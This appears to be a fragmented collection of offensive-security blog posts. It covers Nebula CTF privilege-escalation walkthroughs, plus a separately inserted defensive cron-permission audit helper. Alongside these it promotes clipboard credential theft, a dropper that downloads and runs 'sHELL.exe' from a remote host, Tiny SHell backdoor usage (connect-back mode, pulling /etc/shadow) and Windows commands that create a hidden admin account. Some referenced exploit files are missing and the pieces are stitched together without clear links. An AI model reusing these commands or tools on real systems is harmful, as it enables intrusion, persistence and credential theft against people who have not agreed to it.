Now what? Steal all the passwords and secrets on the clipboard, just one of many things you can do…
powershell.exe Get-Clipboard
That’s it, literally! Put this in a nice loop, along with screenshots of the desktop, and you will be left with a lot of juicy login creds, guaranteed!
Mac Clipboard Dump
pbpaste
Linux
As far as I know, all solutions are third-party installs; the way I usually dump this is from memory. Does anyone have native command-line ways to dump the clipboard on any Linux OS?
Check the home directory of flag03 and take note of the files there. There is a crontab that is called every couple of minutes.
These types of issues are common in easy CTFs, CTF VMs and more. The issue is generally that a command running as another user can be abused in some way; in Linux the most common ones that can be abused are wildcards (*) and directory trees. Today we will focus on a wildcard command that will enable us to do whatever we need to as the user, in this case flag03, because this cron job runs as that user.
Solution #1
In our bash script we will use “chmod +s”, which sets the set-user-ID and set-group-ID bits on execution, exactly what we want in order to spawn a shell as user flag03.
First let’s create our exploit. We first need to know the user we want to mimic; since it’s a CTF VM we know it’s flag03, so we can run the following command:
OK, so the ID is 996, so the shell.c file should look like this…
shell.c
Now let’s create the ‘glue’: the script that will run as flag03, copy our shell, set the SetUID/GID bits and make it executable…
pwn.sh
Commands are run as follows:
nano /tmp/shell.c
cd /home/flag03/writeable.d/
nano pwn.sh
chmod +x pwn.sh
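The precondition this level relies on is a path the cron job touches that a lower-privileged user can write to. The following audit helper is an added example and not part of the original post; run it as the job's uid (996 here, from the challenge) against the cron script and every directory its wildcard expands, such as /home/flag03/writeable.d.

```c
/* Added example, not part of the original post: a small audit helper for
 * the precondition the level03 cron job relies on, a path the job operates
 * on that a lower-privileged user can write to. Policy and stat() are kept
 * apart so the policy can be checked against constructed values. */
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>

/* Returns 1 when a path with these bits is safe for a cron job running as
 * job_uid to touch: owned by root or by job_uid itself, and writable by
 * neither group nor others. Anything else lets another user place files
 * whose names the job's wildcard will expand. */
int cron_path_is_safe(unsigned mode, unsigned owner, unsigned job_uid) {
    if (owner != 0 && owner != job_uid) return 0;   /* someone else owns it */
    if (mode & (S_IWGRP | S_IWOTH)) return 0;       /* group/world writable */
    return 1;
}

/* stat()s each path and reports the unsafe ones. Returns the number
 * flagged, or -1 if a path could not be examined. */
int audit_cron_paths(int npaths, char **paths, unsigned job_uid) {
    int flagged = 0;
    for (int i = 0; i < npaths; i++) {
        struct stat st;
        if (stat(paths[i], &st) != 0) {
            perror(paths[i]);
            return -1;
        }
        if (!cron_path_is_safe(st.st_mode, st.st_uid, job_uid)) {
            printf("UNSAFE %s (owner %u, mode %04o)\n", paths[i],
                   (unsigned)st.st_uid, (unsigned)st.st_mode & 07777);
            flagged++;
        }
    }
    return flagged;
}

/* Usage: ./cronaudit <job_uid> <path>...  e.g. 996 /home/flag03/writeable.d
 * Exit status 1 means at least one path was flagged. */
int main(int argc, char **argv) {
    if (argc < 3) {
        fprintf(stderr, "usage: %s <job_uid> <path>...\n", argv[0]);
        return 2;
    }
    unsigned job_uid = (unsigned)strtoul(argv[1], NULL, 10);
    int n = audit_cron_paths(argc - 2, argv + 2, job_uid);
    return n < 0 ? 2 : (n > 0 ? 1 : 0);
}
```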
I have some great cron priv. esc. examples in the archives from old jobs/CTFs; when I get a chance I will update this post on all things cron-based priv. esc.
A lot of these are common Linux files that are Set User ID, so over time you get to know them and ignore them, unless you’re in a CTF that is trolling you and the issue is in a common binary, so always check anyway if you’re at a dead end or it’s an old version with known vulnerabilities.
Of course “/bin/.../flag00” is seriously suspect, so we try this…
level00@nebula:~$ /bin/.../flag00
Congrats, now run getflag to get your flag!
flag00@nebula:~$ getflag
You have successfully executed getflag on a target account
It really was that easy, but do not underestimate the power of Set User ID: it has allowed me to priv. esc. more times than I can recall. It’s powerful, it’s common, use it! Always check permissions!
Search for SUID/SGID binaries
find / -maxdepth 6 \( -perm -g=s -o -perm -4000 \) ! -type l -exec ls -ld {} \; 2>/dev/null
Challenge source is provided, can we spot the vulnerability?
We know we can alter environment variables and that the program will do the following:
setresuid(), which sets the real user ID, the effective user ID and the saved set-user-ID of the calling process, and setresgid(), which sets the real GID, effective GID and saved set-group-ID of the calling process.
With the source code, and access to the server, it’s easy to spot the issue:
If we can change $PATH so that /tmp, a place we know we can write to, is searched first, then we can put our own ‘echo’ binary there, which will allow us to run a process as flag01. Our echo program will simply spawn a new shell.
nano /tmp/echo.c
cc /tmp/echo.c -o /tmp/echo
export PATH=/tmp/:$PATH
cd /home/flag01
./flag01
getflag
This one is easy, we can just inject a command into the USER environment variable.
cd /home/flag02
USER=";/bin/sh;" ./flag02
getflag
The two semicolons in the “;/bin/sh;” injection are important, as bash needs them to separate the commands; otherwise it will look for “echo /bin/sh is cool”, which of course is junk for us.
Ever wanted a stealthy *Admin App 😉 that can hide itself? Restore itself? Update itself? Communicate without Eavesdroppers? Has anti debugging techniques? and can bypass common AV? Yea, me too. So we will build one in C, because C is also good to learn for pentesting, reversing, CTFs and much more. I am an experienced programmer but C is my weakest language so if I make n00b mistakes please tell me and help me out a little ❤
Dropper.c
I have had this code for years; it has served me well and was originally taken from a book called Advanced Persistent Threat Hacking, which was quite good from what I remember.
#include <file>
This variant is used for system header files. It searches for a file named file in a standard list of system directories.
#include "file"
This variant is used for header files of your own program. It searches for a file named file first in the directory containing the current file, then in the quote directories and then the same directories used for <file>.
Here we first set up some variables again, then we concatenate some variables like PTL (protocol), DMN (domain) and FLE (file) to make the URL we will request (https://10.10.10.10/sHELL.exe).
Then we use curl to get the file and save it with our callback, then we clean up by closing the file handle, and then we execute the file that was downloaded.
Note: Why am I posting this? Because today I forked it and will add features plus allow recursive file transfer, also some sneaky evasion stuff too. So I am posting this to give you all a background to the tool and also so you can star it on Github for updates if you want to get early releases.
First of all, you should setup your secret key, which is located in tsh.h; the key can be of any length (use at least 12 characters for better security).
It is advised to change SERVER_PORT, the port on which the server will be listening for incoming connections.
You may want to start tshd in “connect-back” mode if it runs on a firewalled box; simply uncomment and modify CONNECT_BACK_HOST in tsh.h.
Compiling Tiny SHell
Run “make <system>”, where <system> can be any one of these: linux, freebsd, openbsd, netbsd, cygwin, sunos, irix, hpux, osf
How to use the server
It can be useful to set $HOME and the file creation mask before starting the server:
% umask 077; HOME=/var/tmp ./tshd
How to use the client
Make sure tshd is running on the remote host.
Start a shell:
./tsh <hostname>
Execute a command:
./tsh <hostname> “uname -a”
Transfer files:
./tsh <hostname> get /etc/shadow
./tsh <hostname> put vmlinuz /boot
Multiple file transfers
At the moment, Tiny SHell does not support scp-like multiple and/or recursive file transfers. You can work around this bug by simply making a tar archive and transferring it.
./tsh host "stty raw; tar -cf - /etc 2>/dev/null" | tar -xvf -
On some brain-dead systems (actually, IRIX and HP-UX), Ctrl-C and other control keys do not work correctly. Fix it with:
Please remember that the secret key is stored in clear inside both tsh and tshd executables; therefore you should make sure that no one except you has read access to these two files. However, you may choose not to store the real (valid) key in the client, which will then ask for a password when it starts.
I WAS VERY PUSHED FOR TIME TODAY, I HAVE A LOT MORE TO ADD SO PLEASE KEEP CHECKING AS THIS WILL GROW AND GROW! I will also try and organise this better and add my smart recon scripts. ❤
Current User
whoami /all
On older machines, whoami might not be available so to find out the current user try the following:
echo %username%
All Users
net user
Add User
net user hacker hack3d /add
Make User Admin
net localgroup administrators hacker /add
Remove User
net user hacker /del
Files
type %SYSTEMDRIVE%\boot.ini
type %WINDIR%\win.ini
type %WINDIR%\System32\drivers\etc\hosts
We know the situation all too well: we have remote code execution and can upload and/or write files through a temperamental connection, but we want something a little more robust, something like netcat, which always comes in so damn handy when pwning Unix systems.
A good tip that often comes in handy is to base64-encode a file, then simply copy the base64 blob to a file via a vuln or RCE and decode it either before or after transfer, depending on your RCE situation. If you try to copy a file as-is, in many situations troublesome contents like language operators or null bytes will break the connection or the application or, worse, crash the target host.